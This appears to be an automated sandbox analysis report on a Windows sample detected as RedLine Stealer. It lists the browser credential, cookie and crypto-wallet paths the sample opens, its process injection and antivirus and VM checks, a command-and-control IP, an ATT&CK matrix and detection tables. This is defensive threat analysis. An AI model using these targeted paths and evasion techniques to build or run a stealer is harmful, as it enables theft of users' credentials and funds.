                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF43D74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,7_2_0DF43D74
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF353E0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,7_2_0DF353E0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,15_2_00007FF79DAF4F10
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E33A4 GetVersionExW,3_2_00007FF7F73E33A4
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 9.0.2FDD.tmp.ssg.exe.330000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.1356438297.0000000000332000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.1353048341.000000000A4FB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 2FDD.tmp.ssg.exe PID: 1184, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe, type: DROPPED
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 2FDD.tmp.ssg.exe PID: 1184, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 9.0.2FDD.tmp.ssg.exe.330000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.1356438297.0000000000332000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.1353048341.000000000A4FB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 2FDD.tmp.ssg.exe PID: 1184, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts12
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credential API Hooking                    		1
                    Account Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		Logon Script (Windows)1
                    Access Token Manipulation                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Credential API Hooking                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Exploitation for Client Execution                    		Login Hook912
                    Process Injection                    		3
                    Obfuscated Files or Information                    		NTDS136
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		LSA Secrets681
                    Security Software Discovery                    		SSHKeylogging122
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials351
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Rootkit                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd912
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                    Hidden Files and Directories                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575807 Sample: m5804Te9Uw.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Multi AV Scanner detection for dropped file 2->73 75 8 other signatures 2->75 9 m5804Te9Uw.exe 1 3 2->9         started        process3 file4 55 C:\Users\user\...\443320E440F81953448019.exe, PE32+ 9->55 dropped 57 443320E440F8195344...exe:Zone.Identifier, ASCII 9->57 dropped 83 Found evasive API chain (may stop execution after checking mutex) 9->83 85 Found API chain indicative of debugger detection 9->85 87 Contains functionality to inject code into remote processes 9->87 89 7 other signatures 9->89 13 svchost.exe 1 9->13         started        16 audiodg.exe 2 9->16         started        18 msiexec.exe 2 9->18         started        signatures5 process6 signatures7 117 Found evasive API chain (may stop execution after checking mutex) 13->117 119 Found API chain indicative of debugger detection 13->119 121 Injects code into the Windows Explorer (explorer.exe) 13->121 20 explorer.exe 47 17 13->20 injected 123 Changes the view of files in windows explorer (hidden files and folders) 16->123 125 Writes to foreign memory regions 16->125 127 Creates a thread in another existing process (thread injection) 16->127 129 Injects a PE file into a foreign processes 18->129 process8 dnsIp9 67 185.81.68.147, 1912, 49708, 49710 KLNOPT-ASFI Finland 20->67 49 C:\Users\user\AppData\...\6556.tmp.update.exe, PE32+ 20->49 dropped 51 C:\Users\user\AppData\...\5B34.tmp.zx.exe, PE32+ 20->51 dropped 53 C:\Users\user\AppData\...\2FDD.tmp.ssg.exe, PE32 20->53 dropped 77 System process connects to network (likely due to code injection or exploit) 20->77 79 Benign windows process drops PE files 20->79 81 Found evasive API chain (may stop execution after checking mutex) 20->81 25 5B34.tmp.zx.exe 52 20->25         started        29 443320E440F81953448019.exe 3 20->29         started        31 2FDD.tmp.ssg.exe 5 4 20->31         started        33 443320E440F81953448019.exe 3 20->33         started        file10 signatures11 process12 file13 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->59 dropped 61 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->61 dropped 63 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->63 dropped 65 47 other files (7 malicious) 25->65 dropped 91 Multi AV Scanner detection for dropped file 25->91 93 Machine Learning detection for dropped file 25->93 35 5B34.tmp.zx.exe 25->35         started        95 Found evasive API chain (may stop execution after checking mutex) 29->95 97 Found API chain indicative of debugger detection 29->97 99 Writes to foreign memory regions 29->99 101 Injects a PE file into a foreign processes 29->101 37 svchost.exe 29->37         started        39 audiodg.exe 29->39         started        41 msiexec.exe 29->41         started        103 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->103 105 Found many strings related to Crypto-Wallets (likely being stolen) 31->105 107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 31->107 113 2 other signatures 31->113 109 Allocates memory in foreign processes 33->109 111 Modifies the context of a thread in another process (thread injection) 33->111 115 2 other signatures 33->115 43 svchost.exe 33->43         started        45 audiodg.exe 33->45         started        47 msiexec.exe 33->47         started        signatures14 process15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    m5804Te9Uw.exe55%ReversingLabsWin64.Trojan.Marte
                    m5804Te9Uw.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\6556.tmp.update.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                    C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe33%ReversingLabsWin64.Infostealer.ClipBanker
                    C:\Users\user\AppData\Local\Temp\6556.tmp.update.exe55%ReversingLabsWin64.Trojan.Marte
                    C:\Users\user\AppData\Local\Temp\_MEI5602\VCRUNTIME140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\_bz2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\_ctypes.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\_hashlib.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\_lzma.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\_socket.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\libcrypto-1_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\libffi-7.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\python38.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\select.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\ucrtbase.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI5602\unicodedata.pyd0%ReversingLabs
                    C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe55%ReversingLabsWin64.Trojan.Marte

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.datacontract.org0%Avira URL Cloudsafe
                    http://crl.micN0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sct2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtab2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.datacontract.org2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/Entity/Id23ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id12Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000002.2536416796.0000000002FB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2161354735.0000000002FB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1283918666.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id2Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha12FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id21Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#5B34.tmp.zx.exe, 00000010.00000003.1498776616.0000028A025BF000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1498869815.0000028A0261C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1499598926.0000028A0265A000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1499102662.0000028A0265C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1496621550.0000028A025EA000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1498943407.0000028A02658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id6ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 00000007.00000003.1651386271.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1301437312.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2550263362.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2159715727.000000000D1D6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
